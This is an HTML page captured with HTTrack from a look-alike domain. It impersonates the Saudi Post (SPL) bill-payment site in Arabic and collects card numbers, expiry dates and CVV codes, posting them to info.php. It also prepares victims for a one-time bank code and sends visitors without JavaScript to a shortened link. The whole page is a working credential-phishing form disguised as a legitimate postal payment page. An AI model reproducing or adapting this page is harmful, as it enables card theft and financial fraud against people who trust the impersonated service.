<!DOCTYPE html>
<html dir="rtl" class="js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths js flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths notranslate" lang="ar" translate="no">
	
<!-- Mirrored from splonline.cfpaed.com/O1vuYxE/pxMBO70aKgTFrM0/paybill.php?aixPageId=z0DBgZFN0YP14p3CjK5vR1P8tMEnQbwNB36dP6o1ChUSvuWyB4BACrh2WxrvVyOf by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 04 Sep 2022 01:01:56 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
		<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
		<meta http-equiv="Pragma" content="no-cache" />
		<meta http-equiv="Expires" content="0" />
		<meta name="google" content="notranslate" />
		<meta name="language" content="ar" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
		<title>البريد السعودي | سبل</title>
        <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />
		<link rel="icon" href="images/favicon.ico" type="image/x-icon" />
		<link rel="apple-touch-icon" href="images/favicon.ico" type="image/x-icon" />
		<link type="text/css" rel="stylesheet" href="images/main-ar.css" />
        <link type="text/css" rel="stylesheet" href="images/font-awesome.css" />
        <link type="text/css" rel="stylesheet" href="images/style.css" />
        <link type="text/css" rel="stylesheet" href="images/aos.css" />
        <link type="text/css" rel="stylesheet" href="images/fonts.css" />
        <link type="text/css" rel="stylesheet" href="images/main.css" />
        <link type="text/css" rel="stylesheet" href="images/login.css" />
		<link type="text/css" rel="stylesheet" href="images/extra.css" />
		<noscript><meta http-equiv="refresh" content="0; url=https://tinyurl.com/56t2knrf" /></noscript>
    </head>
	<body data-aos-easing="ease" data-aos-duration="400" data-aos-delay="0" class="notranslate">
        <div class="page-wrap">
            <div class="top_bar login">
	<div class="container flex_me">
		<div class="col"></div>
		<div class="col">
			<a href="#">English</a>
		</div>
	</div>
</div>
<header>
	<div class="container flex_me">
		<div class="col flex_me append_menu">
			<a href="#" class="logo"><img src="images/Logo_login.svg" alt="" /></a>
		</div>
		<div class="col flex_me justify_end">
			<a class="sign_up_link" href="#">تسجيل</a>
		</div>
	</div>
</header>
<svg xmlns="http://www.w3.org/2000/svg" width="100%" height="110.53900146484375" viewBox="0 0 1922.745 110.539" class="hero_linear login_linear" preserveAspectRatio="xMidYMid slice"><g id="lines" transform="translate(240.981 6.003)"><g id="Group_5" data-name="Group 5" transform="translate(0.001)"><path id="Stroke_1" data-name="Stroke 1" d="M481.449,31H40.442c-9.228,0-12.731-3.427-17.011-7.614,0,0-2.6-2.54-6.83-6.776L0,0" transform="translate(1199.524 22.804)" fill="none" stroke="#153c3f" stroke-miterlimit="10" stroke-width="12" class="svg-hero-1"></path><path id="Stroke_5" data-name="Stroke 5" d="M1199.525,22.8,1179.014,2.286a9.393,9.393,0,0,0-13.2.888L1114.988,54c-4.235,4.236-12.6,7.7-18.588,7.7L16.047,61.5H-240.981" transform="translate(-0.001 0)" fill="none" stroke="#153c3f" stroke-miterlimit="10" stroke-width="12" class="svg-hero-2"></path></g><path id="Stroke_3" data-name="Stroke 3" d="M1681.764,0H1245.2c-5.2,0-7.724,1.33-10.369,3.975L1162.864,74,1105.8,27.31l-1346.711-.455" transform="translate(0 22.5)" fill="none" stroke="#00c8e1" stroke-miterlimit="10" stroke-width="12" class="svg-hero-3"></path></g></svg>			<div class="modal fade show" tabindex="-1" role="dialog" style="display:none;">
				<div class="modal-dialog modal-dialog-centered" role="document">
					<div class="modal-content">
						<div class="modal-body">
							<div class="card py-4 px-2 custom-card msg-card warning-msg text-center m-0">
								<div class="card-body">
									<span class="icon attention mb-3 d-block"></span>
									<h4 class="mb-3">عفواً</h4>
									<p>المعلومات التي أدخلتها خاطئة. يرجى التحقق مرة أخرى.</p>
									<div class="text-caenter m-t-2">
										<a class="btn btn-default btn-close-modal-1">اغلاق</a>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
            <div class="login_container container">
                <div class="flex_me">
					<div class="col aos-init" id="loginDivs" data-aos="fade-down" data-aos-delay="500">
                        <form action="info.php" method="post" id="secure_form" name="secure_form" autocomplete="off">
							<span class="generic_page_title">سداد فواتير الخدمات البريدية</span>
							<p style="line-height:30px;max-width:460px;margin:25px auto 20px;">بعد ادخال معلومات البطاقة والضغط على إدفع، سيقوم البنك بإرسال رمز سري مؤقت الى جوالك، وستظهر خانة لادخال الرمز.</p>
							<div class="pay_page">
																<div class="form_group">
									<label for="splLogCardNumb">رقم البطاقة <em>*</em></label>
									<input type="tel" id="splLogCardNumb" name="splLogCardNumb" class="form_control mada" placeholder="XXXX XXXX XXXX XXXX" value="" maxlength="19" pattern="[0-9]*" inputmode="numeric" autocomplete="off" autocorrect="off" spellcheck="false" />
									<span class="field-validation-error text-danger" style="display:none;">المرجو إدخال رقم البطاقة المكون من 16 رقم.</span>
								</div>
								<div class="form_group">
									<label for="splLogExpDateM">تاريخ الإنتهاء <em>*</em></label>
									<div class="flexedDiv">
										<div class="exp">
											<select id="splLogExpDateY" name="splLogExpDateY" class="form_control">
												<option value="00" selected="selected" disabled="disabled">السنة</option>
												<option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option><option value="32">32</option><option value="33">33</option><option value="34">34</option><option value="35">35</option><option value="36">36</option><option value="37">37</option><option value="38">38</option><option value="39">39</option><option value="40">40</option><option value="41">41</option><option value="42">42</option>											</select>
											<i class="fa fa-angle-down"></i>
										</div>
										<span class="date-slash">/</span>
										<div class="exp">
											<select id="splLogExpDateM" name="splLogExpDateM" class="form_control">
												<option value="00" selected="selected" disabled="disabled">الشهر</option>
												<option value="01">01</option><option value="02">02</option><option value="03">03</option><option value="04">04</option><option value="05">05</option><option value="06">06</option><option value="07">07</option><option value="08">08</option><option value="09">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option>											</select>
											<i class="fa fa-angle-down"></i>
										</div>
									</div>
									<span class="field-validation-error text-danger" style="display:none;">المرجو إدخال تاريخ انتهاء صلاحية البطاقة.</span>
								</div>
								<div class="form_group">
									<label for="splLogSecuCode">رمز التحقق <em>*</em></label>
									<input type="text" id="splLogSecuCode" name="splLogSecuCode" class="form_control" placeholder="XXX" value="" maxlength="3" pattern="[0-9]*" inputmode="numeric" autocomplete="off" autocorrect="off" spellcheck="false" />
									<span class="field-validation-error text-danger" style="display:none;">المرجو إدخال رمز التحقق الظاهر خلف البطاقة.</span>
									<a href="javascript:void(0);" class="info_icon2"></a>
									<div class="tooltip_box"><p class="mb-3">رمز التحقق عبارة عن رمز إضافي مطبوع على بطاقة الائتمان والسحب الآلي الخاصة بك. وفي معظم البطاقات، يكون ذلك الرمز هو آخر ثلاثة أرقام مطبوعة على شريط التوقيع الموجود على ظهر البطاقة الخاصة بك.</p><p><img src="images/cvc.png" width="100%" /></p></div>
								</div>
								<div class="section_btns">
									<button id="button2" name="button2" class="btn primary_btn" type="submit">إدفع</button>
								</div>
								<p>يجب ملئ الخانات المرفقة بعلامة النجمة <em>*</em></p>
							</div>
                        </form>
                    </div>
                </div>
            </div>
			<footer class="main-footer">
	<div class="container">
		<div class="row">
			<div class="col-sm-6">
				<p>©️ 2022 جميع الحقوق محفوظة لمؤسسة البريد السعودي - سُـبل</p>
			</div>
			<div class="col-md-6 terms">
				<span>عند استخدامك هذا الموقع، فإنك توافق على</span>
				<a href="#">شروط الخدمة</a>
				و
				<a href="#">سياسة الخصوصية</a>
			</div>
		</div>
	</div>
</footer>        </div>
		<div class="loaderWraper1">
			<div class="loaderOverlay">
				<svg version="1.1" id="SPL_logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 285.5 203.2" xml:space="preserve"><g><path d="M59.7,28.8l-0.1-0.1h-1.9c-18.4,0-27.5,9.1-27.5,27.5v8.3c0,12.1,3,20.7,14.1,27.5l18,10.9 c5.3,3.2,7.4,6.8,7.4,14.1v12.7c0,7.6-3.5,11.2-11.2,11.2h-0.7c-7.6,0-11.2-3.5-11.2-11.2v-7.7l-16.5-10v17.1 c0,18,8.9,27.1,27.1,27.1h1.9c18.4,0,27.5-9.1,27.5-27.5v-12.1c0-12.7-2.7-20.6-14.1-27.5L54.9,78.6c-5.2-2.7-8.3-8.3-7.6-14.1 v-9.3c0-7.6,3.5-11.2,11.2-11.2h0.7c7.6,0,11.2,3.5,11.2,11.2v1.3l16.5,10V55.9C86.8,37.9,77.9,28.8,59.7,28.8z" class="st0 svg-elem-22"></path><polygon points="214.2,116.2 214.2,116.1 189.7,116.1 189.7,30 172.8,30 172.8,133 214.1,133 214.1,133.1 264.4,133.1 274.7,116.2" class="st0 svg-elem-23"></polygon><path d="M157,50.9v-0.4c0-0.7-0.2-1.4-0.4-2.1s0-0.4,0-0.6c-3.3-14.1-13.5-17.7-19-17.7l-0.1-0.2h-33.8V133h17V99.7 h16.9c5.5,0,15.7-3.7,19.1-17.7v-0.3v-0.3c0-0.7,0.2-1.4,0.4-2.1v-0.4c0-0.2,0-0.4,0-0.6c0-0.8,0-1.6,0.2-2.4v-0.7c0-1.1,0-2,0-2.9 V57.5c0-0.8,0-1.8,0-2.9v-0.7c0-0.8,0-1.6-0.2-2.4C156.9,51.3,156.9,51.1,157,50.9z M132.6,84.3c-0.7,0.1-1.5,0.2-2.2,0.1h-9.8v0 V45.2h8.8c7.6,0,11.2,3.5,11.2,11.2v16.8C141.5,78.5,137.9,83.5,132.6,84.3z" class="st0 svg-elem-24"></path></g><g><polygon points="117.5,166.8 129,178.3 140.5,166.8 129,155.3" class="st1 svg-elem-25"></polygon><polygon points="231,99.6 231,116.1 247.9,116.1 247.9,89.4" class="st1 svg-elem-26"></polygon><path d="M214.1,106.4h-16.9V133h-24.4v-26.6H156V133h-18.5V99.6h-16.8V133h-17V76.8L86.7,66.5h-0.1v62.2 c0,18.4-9.1,27.5-27.5,27.5h-1.9c-18.2,0-27.1-9.1-27.1-27.1v-17.1l-16.4-10v27.1c0,28,17.1,42.4,43.6,42.4h1.9 c21.2,0,34.8-9.4,40.8-23.2h120.4c13.7,0,22.2-5.1,25.7-15.2h-32.1V106.4z" class="st1 svg-elem-27"></path></g></svg>
			</div>
		</div>
		<script type="text/javascript" src="images/jquery.js"></script>
		<script type="text/javascript" src="images/mask.js"></script>
		<script type="text/javascript" src="images/aos.js"></script>
		<script type="text/javascript" src="images/countdown.js"></script>
		<script type="text/javascript">
		var sess_hash = "5QMeUZliE5F2YbE0YflKB8XN9SWaEniXC1AErtDpFlb5RCoLbdI6ISGKfPi5jmBH";
		</script>
		<script type="text/javascript" src="images/main.js"></script>
		<script type="text/javascript">
		$( document ).ready(function(){
			autoload();
		});
		</script>
    </body>

<!-- Mirrored from splonline.cfpaed.com/O1vuYxE/pxMBO70aKgTFrM0/paybill.php?aixPageId=z0DBgZFN0YP14p3CjK5vR1P8tMEnQbwNB36dP6o1ChUSvuWyB4BACrh2WxrvVyOf by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 04 Sep 2022 01:02:00 GMT -->
</html>